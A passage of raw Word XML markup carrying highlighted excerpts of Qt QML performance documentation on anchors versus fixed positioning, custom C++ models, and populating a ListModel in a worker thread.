      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item coordinates are always relative to their parent, so if you wanted to be a fixed offset from your parent's 0,0 coordinate you should not use anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the child Rectangle objects are in the same place, but the anchors code shown is not as resource efficient as the code which uses fixed positioning via static initialization:</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60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60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fixedPositioning</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x</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y</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height</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anchorPositioning</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anchors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fill</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parent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anchors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margins</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7A3951">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="940" w:name="models-and-views"/>
      <w:bookmarkStart w:id="941" w:name="_Toc483000729"/>
      <w:bookmarkStart w:id="942" w:name="_Toc483003743"/>
      <w:bookmarkStart w:id="943" w:name="_Toc483604081"/>
      <w:bookmarkStart w:id="944" w:name="_Toc483605301"/>
      <w:bookmarkEnd w:id="940"/>
      <w:r w:rsidRPr="007A3951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Models and Views</w:t>
      </w:r>
      <w:bookmarkEnd w:id="941"/>
      <w:bookmarkEnd w:id="942"/>
      <w:bookmarkEnd w:id="943"/>
      <w:bookmarkEnd w:id="944"/>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3656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Most applications will have at least one model feeding data to a view</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. There are some </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>semantics which application developers need to be aware of, in order to achieve maximal performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A3951">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="945" w:name="custom-c-models"/>
      <w:bookmarkStart w:id="946" w:name="_Toc483000730"/>
      <w:bookmarkStart w:id="947" w:name="_Toc483003744"/>
      <w:bookmarkStart w:id="948" w:name="_Toc483604082"/>
      <w:bookmarkStart w:id="949" w:name="_Toc483605302"/>
      <w:bookmarkEnd w:id="945"/>
      <w:r w:rsidRPr="007A3951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom C++ Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="946"/>
      <w:bookmarkEnd w:id="947"/>
      <w:bookmarkEnd w:id="948"/>
      <w:bookmarkEnd w:id="949"/>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It is often desirable to write your </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>own custom model in C++ for use with a view in QML</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. While the </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optimal implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of any such model will de</w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pend heavily on the use-case</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it must fulfil, some </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>general guidelines</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="003656A0" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Be as asynchronous as possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="003656A0" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do all processing in a (low priority) worker thread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="003656A0" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Batch up backend operations so that (potentially slow) I/O and IPC is minimized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="003656A0" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sliding slice window</w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to cache results, whose parameters are determined </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with the help of profiling</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It is important to note that </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using a low-priority worker thread is recommended to</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> minimize the risk of starving the GUI thread (which could result in worse perceived performance). Also, remember that </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>synchronization and locking mechanisms can be a significant cause of slow performance, and so care should be taken to avoid unnecessary locking</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A3951">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="950" w:name="listmodel-qml-type"/>
      <w:bookmarkStart w:id="951" w:name="_Toc483000731"/>
      <w:bookmarkStart w:id="952" w:name="_Toc483003745"/>
      <w:bookmarkStart w:id="953" w:name="_Toc483604083"/>
      <w:bookmarkStart w:id="954" w:name="_Toc483605303"/>
      <w:bookmarkEnd w:id="950"/>
      <w:r w:rsidRPr="007A3951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListModel QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="951"/>
      <w:bookmarkEnd w:id="952"/>
      <w:bookmarkEnd w:id="953"/>
      <w:bookmarkEnd w:id="954"/>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QML provides a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId644" w:history="1">
        <w:r w:rsidRPr="003656A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type which can be used to feed data to a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId645" w:history="1">
        <w:r w:rsidRPr="003656A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It should suffice for most use-cases and </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be relatively performant</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so long as it is used correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A3951">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="955" w:name="populate-within-a-worker-thread"/>
      <w:bookmarkStart w:id="956" w:name="_Toc483000732"/>
      <w:bookmarkStart w:id="957" w:name="_Toc483604084"/>
      <w:bookmarkStart w:id="958" w:name="_Toc483605304"/>
      <w:bookmarkEnd w:id="955"/>
      <w:r w:rsidRPr="007A3951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Populate Within A </w:t>
      </w:r>
      <w:r w:rsidRPr="007A3951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Worker Thread</w:t>
      </w:r>
      <w:bookmarkEnd w:id="956"/>
      <w:bookmarkEnd w:id="957"/>
      <w:bookmarkEnd w:id="958"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="009D67EF" w:rsidRDefault="00490E7E" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId646" w:history="1">
        <w:r w:rsidR="005D1E34" w:rsidRPr="009D67EF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005D1E34" w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>elements can be populated in a (low priority) worker thread in JavaScript.</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The developer must explicitly call "</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sync</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()" on the</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId647" w:history="1">
        <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from within the</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId648" w:history="1">
        <w:r w:rsidR="005D1E34" w:rsidRPr="009D67EF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to have the changes synchronized to the main thread. See the</w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId649" w:history="1">
        <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005D1E34" w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for more information.</w:t>
      </w:r>
      <w:r w:rsidR="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D67EF" w:rsidRPr="007A3951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this use-case.</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9D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please note that using a</w:t>
      </w:r>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId650" w:history="1">
        <w:r w:rsidRPr="009D67EF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
